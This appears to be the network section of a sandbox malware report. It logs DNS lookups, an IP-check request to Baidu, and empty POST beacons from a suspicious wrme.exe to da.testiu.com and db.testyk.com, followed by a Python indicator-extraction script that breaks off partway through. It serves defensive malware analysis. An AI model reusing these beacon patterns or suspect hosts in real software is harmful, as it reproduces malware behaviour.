Jul 25, 2024 02:19:56.575994015 CEST44349711103.224.212.211192.168.2.7
Jul 25, 2024 02:19:57.260245085 CEST44349711103.224.212.211192.168.2.7
Jul 25, 2024 02:19:57.260453939 CEST49711443192.168.2.7103.224.212.211
Jul 25, 2024 02:19:57.261043072 CEST44349711103.224.212.211192.168.2.7
Jul 25, 2024 02:19:57.261363983 CEST49711443192.168.2.7103.224.212.211
Jul 25, 2024 02:19:57.267421007 CEST49711443192.168.2.7103.224.212.211
Jul 25, 2024 02:19:57.267431974 CEST44349711103.224.212.211192.168.2.7
Jul 25, 2024 02:19:57.267736912 CEST44349711103.224.212.211192.168.2.7
Jul 25, 2024 02:19:57.270641088 CEST49711443192.168.2.7103.224.212.211
Jul 25, 2024 02:19:57.316514969 CEST44349711103.224.212.211192.168.2.7
Jul 25, 2024 02:19:57.532381058 CEST44349711103.224.212.211192.168.2.7
Jul 25, 2024 02:19:57.532509089 CEST44349711103.224.212.211192.168.2.7
Jul 25, 2024 02:19:57.535866976 CEST49711443192.168.2.7103.224.212.211
Jul 25, 2024 02:19:57.606165886 CEST49711443192.168.2.7103.224.212.211
Jul 25, 2024 02:19:57.606199026 CEST44349711103.224.212.211192.168.2.7
Jul 25, 2024 02:20:01.540254116 CEST49716443192.168.2.772.52.179.174
Jul 25, 2024 02:20:01.540302992 CEST4434971672.52.179.174192.168.2.7
Jul 25, 2024 02:20:01.540637016 CEST49716443192.168.2.772.52.179.174
Jul 25, 2024 02:20:01.549787998 CEST49716443192.168.2.772.52.179.174
Jul 25, 2024 02:20:01.549813986 CEST4434971672.52.179.174192.168.2.7
Jul 25, 2024 02:20:04.477406025 CEST4434971672.52.179.174192.168.2.7
Jul 25, 2024 02:20:04.477488041 CEST49716443192.168.2.772.52.179.174
Jul 25, 2024 02:20:04.477948904 CEST49716443192.168.2.772.52.179.174
Jul 25, 2024 02:20:04.477994919 CEST4434971672.52.179.174192.168.2.7
Jul 25, 2024 02:20:09.646814108 CEST49724443192.168.2.772.52.179.174
Jul 25, 2024 02:20:09.646852016 CEST4434972472.52.179.174192.168.2.7
Jul 25, 2024 02:20:09.646914959 CEST49724443192.168.2.772.52.179.174
Jul 25, 2024 02:20:09.647355080 CEST49724443192.168.2.772.52.179.174
Jul 25, 2024 02:20:09.647365093 CEST4434972472.52.179.174192.168.2.7
Jul 25, 2024 02:20:12.568268061 CEST4434972472.52.179.174192.168.2.7
Jul 25, 2024 02:20:12.568418026 CEST49724443192.168.2.772.52.179.174
Jul 25, 2024 02:20:12.568752050 CEST49724443192.168.2.772.52.179.174
Jul 25, 2024 02:20:12.568768024 CEST4434972472.52.179.174192.168.2.7
Jul 25, 2024 02:20:17.587205887 CEST49727443192.168.2.772.52.179.174
Jul 25, 2024 02:20:17.587250948 CEST4434972772.52.179.174192.168.2.7
Jul 25, 2024 02:20:17.587357998 CEST49727443192.168.2.772.52.179.174
Jul 25, 2024 02:20:17.587791920 CEST49727443192.168.2.772.52.179.174
Jul 25, 2024 02:20:17.587805033 CEST4434972772.52.179.174192.168.2.7
Jul 25, 2024 02:20:20.502867937 CEST4434972772.52.179.174192.168.2.7
Jul 25, 2024 02:20:20.503052950 CEST49727443192.168.2.772.52.179.174
Jul 25, 2024 02:20:20.503381014 CEST49727443192.168.2.772.52.179.174
Jul 25, 2024 02:20:20.503401995 CEST4434972772.52.179.174192.168.2.7
Jul 25, 2024 02:20:25.523578882 CEST49730443192.168.2.772.52.179.174
Jul 25, 2024 02:20:25.523616076 CEST4434973072.52.179.174192.168.2.7
Jul 25, 2024 02:20:25.523705959 CEST49730443192.168.2.772.52.179.174
Jul 25, 2024 02:20:25.537221909 CEST49730443192.168.2.772.52.179.174
Jul 25, 2024 02:20:25.537239075 CEST4434973072.52.179.174192.168.2.7
Jul 25, 2024 02:20:28.497716904 CEST4434973072.52.179.174192.168.2.7
Jul 25, 2024 02:20:28.497858047 CEST49730443192.168.2.772.52.179.174
Jul 25, 2024 02:20:28.498214960 CEST49730443192.168.2.772.52.179.174
Jul 25, 2024 02:20:28.498241901 CEST4434973072.52.179.174192.168.2.7
Jul 25, 2024 02:20:33.774899006 CEST49733443192.168.2.772.52.179.174
Jul 25, 2024 02:20:33.774959087 CEST4434973372.52.179.174192.168.2.7
Jul 25, 2024 02:20:33.775161028 CEST49733443192.168.2.772.52.179.174
Jul 25, 2024 02:20:33.775592089 CEST49733443192.168.2.772.52.179.174
Jul 25, 2024 02:20:33.775612116 CEST4434973372.52.179.174192.168.2.7
Jul 25, 2024 02:20:36.712219000 CEST4434973372.52.179.174192.168.2.7
Jul 25, 2024 02:20:36.712435961 CEST49733443192.168.2.772.52.179.174
Jul 25, 2024 02:20:36.712743044 CEST49733443192.168.2.772.52.179.174
Jul 25, 2024 02:20:36.712774038 CEST4434973372.52.179.174192.168.2.7
Jul 25, 2024 02:20:41.726954937 CEST49736443192.168.2.772.52.179.174
Jul 25, 2024 02:20:41.727006912 CEST4434973672.52.179.174192.168.2.7
Jul 25, 2024 02:20:41.727071047 CEST49736443192.168.2.772.52.179.174
Jul 25, 2024 02:20:41.727550983 CEST49736443192.168.2.772.52.179.174
Jul 25, 2024 02:20:41.727561951 CEST4434973672.52.179.174192.168.2.7
Jul 25, 2024 02:20:44.834012032 CEST4434973672.52.179.174192.168.2.7
Jul 25, 2024 02:20:44.834116936 CEST49736443192.168.2.772.52.179.174
Jul 25, 2024 02:20:44.834646940 CEST49736443192.168.2.772.52.179.174
Jul 25, 2024 02:20:44.834666014 CEST4434973672.52.179.174192.168.2.7
Jul 25, 2024 02:20:49.854026079 CEST49740443192.168.2.772.52.179.174
Jul 25, 2024 02:20:49.854082108 CEST4434974072.52.179.174192.168.2.7
Jul 25, 2024 02:20:49.854187012 CEST49740443192.168.2.772.52.179.174
Jul 25, 2024 02:20:49.854581118 CEST49740443192.168.2.772.52.179.174
Jul 25, 2024 02:20:49.854597092 CEST4434974072.52.179.174192.168.2.7
Jul 25, 2024 02:20:51.813291073 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:20:51.813405037 CEST4969980192.168.2.7103.235.46.96
Jul 25, 2024 02:20:52.830919027 CEST4434974072.52.179.174192.168.2.7
Jul 25, 2024 02:20:52.831063986 CEST49740443192.168.2.772.52.179.174
Jul 25, 2024 02:20:52.831433058 CEST49740443192.168.2.772.52.179.174
Jul 25, 2024 02:20:52.831461906 CEST4434974072.52.179.174192.168.2.7
Jul 25, 2024 02:20:57.851447105 CEST49743443192.168.2.772.52.179.174
Jul 25, 2024 02:20:57.851495981 CEST4434974372.52.179.174192.168.2.7
Jul 25, 2024 02:20:57.851572037 CEST49743443192.168.2.772.52.179.174
Jul 25, 2024 02:20:57.864996910 CEST49743443192.168.2.772.52.179.174
Jul 25, 2024 02:20:57.865015984 CEST4434974372.52.179.174192.168.2.7
Jul 25, 2024 02:21:00.806560040 CEST4434974372.52.179.174192.168.2.7
Jul 25, 2024 02:21:00.807998896 CEST49743443192.168.2.772.52.179.174
Jul 25, 2024 02:21:00.808392048 CEST49743443192.168.2.772.52.179.174
Jul 25, 2024 02:21:00.808422089 CEST4434974372.52.179.174192.168.2.7
Jul 25, 2024 02:21:00.808506012 CEST49743443192.168.2.772.52.179.174
Jul 25, 2024 02:21:00.808515072 CEST4434974372.52.179.174192.168.2.7
Jul 25, 2024 02:21:05.820602894 CEST49746443192.168.2.772.52.179.174
Jul 25, 2024 02:21:05.820650101 CEST4434974672.52.179.174192.168.2.7
Jul 25, 2024 02:21:05.820734024 CEST49746443192.168.2.772.52.179.174
Jul 25, 2024 02:21:05.834160089 CEST49746443192.168.2.772.52.179.174
Jul 25, 2024 02:21:05.834178925 CEST4434974672.52.179.174192.168.2.7
Jul 25, 2024 02:21:08.777955055 CEST4434974672.52.179.174192.168.2.7
Jul 25, 2024 02:21:08.778038025 CEST49746443192.168.2.772.52.179.174
Jul 25, 2024 02:21:08.778455973 CEST49746443192.168.2.772.52.179.174
Jul 25, 2024 02:21:08.778476000 CEST4434974672.52.179.174192.168.2.7
Jul 25, 2024 02:21:13.846995115 CEST49749443192.168.2.772.52.179.174
Jul 25, 2024 02:21:13.847048998 CEST4434974972.52.179.174192.168.2.7
Jul 25, 2024 02:21:13.847106934 CEST49749443192.168.2.772.52.179.174
Jul 25, 2024 02:21:13.847521067 CEST49749443192.168.2.772.52.179.174
Jul 25, 2024 02:21:13.847539902 CEST4434974972.52.179.174192.168.2.7
Jul 25, 2024 02:21:16.823708057 CEST4434974972.52.179.174192.168.2.7
Jul 25, 2024 02:21:16.823815107 CEST49749443192.168.2.772.52.179.174
Jul 25, 2024 02:21:16.824210882 CEST49749443192.168.2.772.52.179.174
Jul 25, 2024 02:21:16.824229956 CEST4434974972.52.179.174192.168.2.7
Jul 25, 2024 02:21:21.836102009 CEST49752443192.168.2.772.52.179.174
Jul 25, 2024 02:21:21.836142063 CEST4434975272.52.179.174192.168.2.7
Jul 25, 2024 02:21:21.836219072 CEST49752443192.168.2.772.52.179.174
Jul 25, 2024 02:21:21.836631060 CEST49752443192.168.2.772.52.179.174
Jul 25, 2024 02:21:21.836644888 CEST4434975272.52.179.174192.168.2.7
Jul 25, 2024 02:21:24.771312952 CEST4434975272.52.179.174192.168.2.7
Jul 25, 2024 02:21:24.771378994 CEST49752443192.168.2.772.52.179.174
Jul 25, 2024 02:21:24.771758080 CEST49752443192.168.2.772.52.179.174
Jul 25, 2024 02:21:24.771778107 CEST4434975272.52.179.174192.168.2.7
Jul 25, 2024 02:21:29.789392948 CEST49755443192.168.2.772.52.179.174
Jul 25, 2024 02:21:29.789437056 CEST4434975572.52.179.174192.168.2.7
Jul 25, 2024 02:21:29.789546967 CEST49755443192.168.2.772.52.179.174
Jul 25, 2024 02:21:29.789964914 CEST49755443192.168.2.772.52.179.174
Jul 25, 2024 02:21:29.789975882 CEST4434975572.52.179.174192.168.2.7
Jul 25, 2024 02:21:32.728606939 CEST4434975572.52.179.174192.168.2.7
Jul 25, 2024 02:21:32.728746891 CEST49755443192.168.2.772.52.179.174
Jul 25, 2024 02:21:32.742465973 CEST49755443192.168.2.772.52.179.174
Jul 25, 2024 02:21:32.742506027 CEST4434975572.52.179.174192.168.2.7
Jul 25, 2024 02:21:37.914264917 CEST49758443192.168.2.772.52.179.174
Jul 25, 2024 02:21:37.914310932 CEST4434975872.52.179.174192.168.2.7
Jul 25, 2024 02:21:37.914410114 CEST49758443192.168.2.772.52.179.174
Jul 25, 2024 02:21:37.914868116 CEST49758443192.168.2.772.52.179.174
Jul 25, 2024 02:21:37.914884090 CEST4434975872.52.179.174192.168.2.7
Jul 25, 2024 02:21:40.130414009 CEST4969980192.168.2.7103.235.46.96
Jul 25, 2024 02:21:40.135855913 CEST8049699103.235.46.96192.168.2.7
Jul 25, 2024 02:21:40.885808945 CEST4434975872.52.179.174192.168.2.7
Jul 25, 2024 02:21:40.885979891 CEST49758443192.168.2.772.52.179.174
Jul 25, 2024 02:21:40.886271954 CEST49758443192.168.2.772.52.179.174
Jul 25, 2024 02:21:40.886297941 CEST4434975872.52.179.174192.168.2.7
Jul 25, 2024 02:21:45.898969889 CEST49761443192.168.2.772.52.179.174
Jul 25, 2024 02:21:45.899020910 CEST4434976172.52.179.174192.168.2.7
Jul 25, 2024 02:21:45.899130106 CEST49761443192.168.2.772.52.179.174
Jul 25, 2024 02:21:45.899549007 CEST49761443192.168.2.772.52.179.174
Jul 25, 2024 02:21:45.899559021 CEST4434976172.52.179.174192.168.2.7
Jul 25, 2024 02:21:48.855900049 CEST4434976172.52.179.174192.168.2.7
Jul 25, 2024 02:21:48.856147051 CEST49761443192.168.2.772.52.179.174
Jul 25, 2024 02:21:48.856414080 CEST49761443192.168.2.772.52.179.174
Jul 25, 2024 02:21:48.856437922 CEST4434976172.52.179.174192.168.2.7
Jul 25, 2024 02:21:53.869878054 CEST49764443192.168.2.772.52.179.174
Jul 25, 2024 02:21:53.869987011 CEST4434976472.52.179.174192.168.2.7
Jul 25, 2024 02:21:53.870086908 CEST49764443192.168.2.772.52.179.174
Jul 25, 2024 02:21:53.870605946 CEST49764443192.168.2.772.52.179.174
Jul 25, 2024 02:21:53.870640993 CEST4434976472.52.179.174192.168.2.7
Jul 25, 2024 02:21:56.803601980 CEST4434976472.52.179.174192.168.2.7
Jul 25, 2024 02:21:56.803711891 CEST49764443192.168.2.772.52.179.174
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 25, 2024 02:19:50.242270947 CEST | 56150 | 53 | 192.168.2.7 | 1.1.1.1
Jul 25, 2024 02:19:50.472724915 CEST | 53 | 56150 | 1.1.1.1 | 192.168.2.7
Jul 25, 2024 02:19:51.416290998 CEST | 49970 | 53 | 192.168.2.7 | 1.1.1.1
Jul 25, 2024 02:19:51.696835995 CEST | 53 | 49970 | 1.1.1.1 | 192.168.2.7
Jul 25, 2024 02:19:54.789952040 CEST | 53233 | 53 | 192.168.2.7 | 1.1.1.1
Jul 25, 2024 02:19:54.979542017 CEST | 51209 | 53 | 192.168.2.7 | 1.1.1.1
Jul 25, 2024 02:19:55.097786903 CEST | 53 | 53233 | 1.1.1.1 | 192.168.2.7
Jul 25, 2024 02:19:56.231825113 CEST | 51159 | 53 | 192.168.2.7 | 1.1.1.1
Jul 25, 2024 02:19:56.573843956 CEST | 53 | 51159 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 25, 2024 02:19:50.242270947 CEST | 192.168.2.7 | 1.1.1.1 | 0x8032 | Standard query (0) | www.baidu.com | A (IP address) | IN (0x0001) | false
Jul 25, 2024 02:19:51.416290998 CEST | 192.168.2.7 | 1.1.1.1 | 0x2c8a | Standard query (0) | du.testjj.com | A (IP address) | IN (0x0001) | false
Jul 25, 2024 02:19:54.789952040 CEST | 192.168.2.7 | 1.1.1.1 | 0x7d5c | Standard query (0) | da.testiu.com | A (IP address) | IN (0x0001) | false
Jul 25, 2024 02:19:54.979542017 CEST | 192.168.2.7 | 1.1.1.1 | 0x7565 | Standard query (0) | time.windows.com | A (IP address) | IN (0x0001) | false
Jul 25, 2024 02:19:56.231825113 CEST | 192.168.2.7 | 1.1.1.1 | 0x85c0 | Standard query (0) | db.testyk.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 25, 2024 02:19:50.472724915 CEST | 1.1.1.1 | 192.168.2.7 | 0x8032 | No error (0) | www.baidu.com | www.a.shifen.com | (none) | CNAME (Canonical name) | IN (0x0001) | false
Jul 25, 2024 02:19:50.472724915 CEST | 1.1.1.1 | 192.168.2.7 | 0x8032 | No error (0) | www.a.shifen.com | www.wshifen.com | (none) | CNAME (Canonical name) | IN (0x0001) | false
Jul 25, 2024 02:19:50.472724915 CEST | 1.1.1.1 | 192.168.2.7 | 0x8032 | No error (0) | www.wshifen.com | (none) | 103.235.46.96 | A (IP address) | IN (0x0001) | false
Jul 25, 2024 02:19:50.472724915 CEST | 1.1.1.1 | 192.168.2.7 | 0x8032 | No error (0) | www.wshifen.com | (none) | 103.235.47.188 | A (IP address) | IN (0x0001) | false
Jul 25, 2024 02:19:51.696835995 CEST | 1.1.1.1 | 192.168.2.7 | 0x2c8a | No error (0) | du.testjj.com | (none) | 72.52.179.174 | A (IP address) | IN (0x0001) | false
Jul 25, 2024 02:19:54.988118887 CEST | 1.1.1.1 | 192.168.2.7 | 0x7565 | No error (0) | time.windows.com | twc.trafficmanager.net | (none) | CNAME (Canonical name) | IN (0x0001) | false
Jul 25, 2024 02:19:55.097786903 CEST | 1.1.1.1 | 192.168.2.7 | 0x7d5c | No error (0) | da.testiu.com | (none) | 103.224.212.216 | A (IP address) | IN (0x0001) | false
Jul 25, 2024 02:19:56.573843956 CEST | 1.1.1.1 | 192.168.2.7 | 0x85c0 | No error (0) | db.testyk.com | (none) | 103.224.212.211 | A (IP address) | IN (0x0001) | false
  • da.testiu.com
  • db.testyk.com
  • www.baidu.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49699 | 103.235.46.96 | 80 | 2760 | C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe
Timestamp | Bytes transferred | Direction | Data
Jul 25, 2024 02:19:50.484626055 CEST | 77 | OUT | GET /s?ie=utf-8&wd=ip HTTP/1.1
User-Agent: UrlTest1
Host: www.baidu.com
Jul 25, 2024 02:19:51.775079966 CEST | 1236 | IN | HTTP/1.1 200 OK
Bdpagetype: 3
Bdqid: 0x913a9748007ce3f9
Cache-Control: private
Connection: keep-alive
Content-Security-Policy: frame-ancestors 'self' https://chat.baidu.com http://mirror-chat.baidu.com https://fj-chat.baidu.com https://hba-chat.baidu.com https://hbe-chat.baidu.com https://njjs-chat.baidu.com https://nj-chat.baidu.com https://hna-chat.baidu.com https://hnb-chat.baidu.com http://debug.baidu-int.com;
Content-Type: text/html;charset=utf-8
Cxy_all: baidu+403b0d6b46f8049133dc443934ae8a33
Cxy_ex: 1721866791+561720840+d41d8cd98f00b204e9800998ecf8427e
Date: Thu, 25 Jul 2024 00:19:51 GMT
P3p: CP=" OTI DSP COR IVA OUR IND COM "
P3p: CP=" OTI DSP COR IVA OUR IND COM "
Server: BWS/1.1
Set-Cookie: BAIDUID=79CBBF35805A5A85A7ECF67663790756:FG=1; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
Set-Cookie: BIDUPSID=79CBBF35805A5A85A7ECF67663790756; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
Set-Cookie: PSTM=1721866791; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
Set-Cookie: BAIDUID=79CBBF35805A5A85DF6A3F153FEEA7E6:FG=1; max-age=31536000; expires=Fri, 25-Jul-25 00:19:51 GMT; domain=.baidu.c
Jul 25, 2024 02:19:51.775096893 CEST | 224 | IN | Data Raw: 6d 3b 20 70 61 74 68 3d 2f 3b 20 76 65 72 73 69 6f 6e 3d 31 3b 20 63 6f 6d 6d 65 6e 74 3d 62 64 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 48 5f 50 53 5f 50 53 53 49 44 3d 36 30 32 33 37 5f 36 30 32 37 36 5f 36 30 33 36 30 5f 36 30 34 36 37 5f 36
Data Ascii: m; path=/; version=1; comment=bdSet-Cookie: H_PS_PSSID=60237_60276_60360_60467_60492_60501_60472; path=/; expires=Fri, 25-Jul-25 00:19:51 GMT; domain=.baidu.comSet-Cookie: X-Use-Search-BFF-WWW=deleted; expires=Thu, 01-Ja
Jul 25, 2024 02:19:51.775110960 CEST | 1236 | IN | Data Raw: 6e 2d 31 39 37 30 20 30 30 3a 30 30 3a 30 31 20 47 4d 54 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 62 61 69 64 75 2e 63 6f 6d 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 64 65 6c 50 65 72 3d 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61
Data Ascii: n-1970 00:00:01 GMT; path=/; domain=.baidu.comSet-Cookie: delPer=0; path=/; domain=.baidu.comSet-Cookie: BD_CK_SAM=1;path=/Set-Cookie: PSINO=7; domain=.baidu.com; path=/Set-Cookie: BDSVRTM=371; path=/Traceid: 172186679134843668581046
Jul 25, 2024 02:19:51.775125980 CEST | 1236 | IN | Data Raw: 2f 63 6f 73 6d 69 63 2f 70 63 2f 63 6f 73 2d 69 63 6f 6e 5f 39 39 66 36 35 36 65 2e 63 73 73 22 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 70 72 65 63 6f 6d 70 6f 73 65 64 22 20 68 72 65 66
Data Ascii: /cosmic/pc/cos-icon_99f656e.css"/><link rel="apple-touch-icon-precomposed" href="https://psstatic.cdn.bcebos.com/video/wiseindex/aa6eef91f8b5b1a33b454c401_1660835115000.png"><title>ip_</title><style data-for="r
Jul 25, 2024 02:19:51.775135994 CEST | 164 | IN | Data Raw: 72 7d 0a 2e 70 31 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 32 30 25 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 31 32 70 74 7d 0a 2e 70 32 7b 77 69 64 74 68 3a 31 30 30 25 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 32 30 25 3b 6d 61 72 67 69 6e 2d
Data Ascii: r}.p1{line-height:120%;margin-left:-12pt}.p2{width:100%;line-height:120%;margin-left:-12pt}#wrapper{_zoom:1}#container{word-break:break-all;word-wrap:break-word
Jul 25, 2024 02:19:51.775242090 CEST | 1236 | IN | Data Raw: 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 0a 2e 63 6f 6e 74 61 69 6e 65 72 5f 73 7b 77 69 64 74 68 3a 31 30 30 32 70 78 7d 0a 2e 63 6f 6e 74 61 69 6e 65 72 5f 6c 7b 77 69 64 74 68 3a 31 32 32 32 70 78 7d 0a 23 63 6f 6e 74 65 6e 74
Data Ascii: ;position:relative}.container_s{width:1002px}.container_l{width:1222px}#content_left{width:636px;float:left;padding-left:35px}#content_right{border-left:1px solid #e1e1e1;float:right}.container_s #content_right{width:271px}.container_l #
Jul 25, 2024 02:19:51.775254965 CEST | 1236 | IN | Data Raw: 69 6e 2d 72 69 67 68 74 3a 32 30 70 78 3b 66 6c 6f 61 74 3a 6c 65 66 74 7d 0a 2e 73 5f 6e 61 76 20 2e 73 5f 6c 6f 67 6f 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 0a 2e 73 5f 74 61 62 7b 6c 69 6e 65 2d 68
Data Ascii: in-right:20px;float:left}.s_nav .s_logo img{border:0;display:block}.s_tab{line-height:18px;padding:20px 0 0;float:left}.s_nav a{color:#00c;font-size:14px}.s_nav b{font-size:14px}.s_ipt_wr{width:536px;height:30px;display:inline-block;margi
Jul 25, 2024 02:19:51.775408030 CEST | 1236 | IN | Data Raw: 61 6e 69 6d 61 74 69 6f 6e 3a 79 75 6e 79 69 6e 67 20 2e 32 73 3b 2d 6f 2d 61 6e 69 6d 61 74 69 6f 6e 3a 79 75 6e 79 69 6e 67 20 2e 32 73 7d 0a 2e 79 79 5f 66 6d 5f 62 6c 75 65 20 2e 73 5f 69 70 74 5f 77 72 2c 2e 79 79 5f 66 6d 5f 62 6c 75 65 20
Data Ascii: animation:yunying .2s;-o-animation:yunying .2s}.yy_fm_blue .s_ipt_wr,.yy_fm_blue .s_ipt_wr.iptfocus,.yy_fm_blue .s_ipt_wr:hover,.yy_fm_blue .s_ipt_wr.ipthover{animation:yy-ipt-blue .2s;border-color:#4791ff transparent #4791ff #4791ff}.yy_fm_
Jul 25, 2024 02:19:51.775418997 CEST | 1236 | IN | Data Raw: 34 37 39 31 66 66 20 74 72 61 6e 73 70 61 72 65 6e 74 20 23 34 37 39 31 66 66 20 23 34 37 39 31 66 66 7d 7d 0a 40 2d 6f 2d 6b 65 79 66 72 61 6d 65 73 20 79 79 2d 69 70 74 2d 62 6c 75 65 7b 30 25 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 65 31
Data Ascii: 4791ff transparent #4791ff #4791ff}}@-o-keyframes yy-ipt-blue{0%{border-color:#e10602 transparent #e10602 #e10602}100%{border-color:#4791ff transparent #4791ff #4791ff}}@keyframes yunying{0%{background-color:#3385ff;border-bottom:1px solid
Jul 25, 2024 02:19:51.775429964 CEST | 896 | IN | Data Raw: 73 20 79 75 6e 79 69 6e 67 2d 62 6c 75 65 7b 30 25 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 31 30 36 30 32 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 33 30 36 30 32 7d 0a 31 30 30 25 7b 62
Data Ascii: s yunying-blue{0%{background-color:#e10602;border-bottom:1px solid #c30602}100%{background-color:#3385ff;border-bottom:1px solid #2d78f4}}.sethf{padding:0;margin:0;font-size:14px}.set_h{display:none;behavior:url(#default#homepage)}.set_f{d
Jul 25, 2024 02:19:51.782552004 CEST | 1236 | IN | Data Raw: 63 66 2e 67 69 66 29 5c 39 7d 0a 2e 62 64 73 75 67 20 6c 69 7b 77 69 64 74 68 3a 35 32 32 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 66 6f 6e 74 3a 31 34 70 78 20 61 72 69 61 6c 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 32 70 78 3b 70 61 64 64 69
Data Ascii: cf.gif)\9}.bdsug li{width:522px;color:#000;font:14px arial;line-height:22px;padding:0 8px;position:relative;cursor:default}.bdsug li.bdsug-s{background:#f0f0f0}.bdsug-store span,.bdsug-store b{color:#7A77C8}.bdsug-store-del{font-size:12px;


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49708 | 103.224.212.216 | 443 | 6296 | C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-25 00:19:55 UTC | 155 | OUT | POST /api/v1/p HTTP/1.1
Host: da.testiu.com
Accept: */*
Content-Type:application/x-www-form-urlencoded; charset=UTF-8; image/gif;
Content-Length: 0
2024-07-25 00:19:56 UTC | 339 | IN | HTTP/1.1 302 Found
date: Thu, 25 Jul 2024 00:19:56 GMT
server: Apache
set-cookie: __tad=1721866796.4553884; expires=Sun, 23-Jul-2034 00:19:56 GMT; Max-Age=315360000
location: http://ww25.da.testiu.com/api/v1/p?subid1=20240725-1019-566c-b2dc-6815f4609260
content-length: 2
content-type: text/html; charset=UTF-8
connection: close
2024-07-25 00:19:56 UTC | 2 | IN | Data Raw: 0a 0a
Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49711 | 103.224.212.211 | 443 | 6296 | C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-25 00:19:57 UTC | 155 | OUT | POST /api/v1/p HTTP/1.1
Host: db.testyk.com
Accept: */*
Content-Type:application/x-www-form-urlencoded; charset=UTF-8; image/gif;
Content-Length: 0
2024-07-25 00:19:57 UTC | 339 | IN | HTTP/1.1 302 Found
date: Thu, 25 Jul 2024 00:19:57 GMT
server: Apache
set-cookie: __tad=1721866797.3434330; expires=Sun, 23-Jul-2034 00:19:57 GMT; Max-Age=315360000
location: http://ww25.db.testyk.com/api/v1/p?subid1=20240725-1019-57bf-a132-0ab44d06a73d
content-length: 2
content-type: text/html; charset=UTF-8
connection: close
2024-07-25 00:19:57 UTC | 2 | IN | Data Raw: 0a 0a
Data Ascii:


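The DNS answers and the three HTTP sessions above are the report's network indicators; the following script is an added example (not Joe Sandbox output or tooling) that turns them into something an analyst can act on. It transcribes the records from the tables, follows each CNAME chain to its terminal A records, maps every contacted IP back to the name the sample actually queried, and flags the traits worth noting: the odd `UrlTest1` User-Agent on the Baidu "ip" lookup, the zero-length POST beacons from wrme.exe, and the 302 to `ww25.<host>` with a `__tad` cookie. That last flag is labelled "domain-parking style" because the pattern matches what parking landing pages return; this is the example's own reading of the response, not a verdict stated in the report.

```python
"""Indicator extraction over the DNS answers and HTTP sessions of this report.

Added example, not Joe Sandbox output or tooling. The records below are
transcribed from the tables above so the script runs offline. The
"domain-parking style" flag (302 to ww25.<host> plus a __tad cookie) is
this example's own reading of the response, not a verdict the report makes.
"""
from urllib.parse import urlsplit

# DNS answer records (name, type, value), transcribed from the report.
DNS_ANSWERS = [
    ("www.baidu.com", "CNAME", "www.a.shifen.com"),
    ("www.a.shifen.com", "CNAME", "www.wshifen.com"),
    ("www.wshifen.com", "A", "103.235.46.96"),
    ("www.wshifen.com", "A", "103.235.47.188"),
    ("du.testjj.com", "A", "72.52.179.174"),
    ("time.windows.com", "CNAME", "twc.trafficmanager.net"),
    ("da.testiu.com", "A", "103.224.212.216"),
    ("db.testyk.com", "A", "103.224.212.211"),
]

# HTTP sessions (one request/response each), transcribed from the report;
# header names are kept as the peers sent them.
HTTP_SESSIONS = [
    {"dst": "103.235.46.96", "port": 80,
     "process": r"C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe",
     "request": "GET /s?ie=utf-8&wd=ip HTTP/1.1",
     "req_headers": {"User-Agent": "UrlTest1", "Host": "www.baidu.com"},
     "status": 200, "resp_headers": {"Server": "BWS/1.1"}},
    {"dst": "103.224.212.216", "port": 443,
     "process": r"C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe",
     "request": "POST /api/v1/p HTTP/1.1",
     "req_headers": {"Host": "da.testiu.com", "Accept": "*/*", "Content-Length": "0"},
     "status": 302,
     "resp_headers": {"set-cookie": "__tad=1721866796.4553884; expires=Sun, 23-Jul-2034 00:19:56 GMT",
                      "location": "http://ww25.da.testiu.com/api/v1/p?subid1=20240725-1019-566c-b2dc-6815f4609260"}},
    {"dst": "103.224.212.211", "port": 443,
     "process": r"C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe",
     "request": "POST /api/v1/p HTTP/1.1",
     "req_headers": {"Host": "db.testyk.com", "Accept": "*/*", "Content-Length": "0"},
     "status": 302,
     "resp_headers": {"set-cookie": "__tad=1721866797.3434330; expires=Sun, 23-Jul-2034 00:19:57 GMT",
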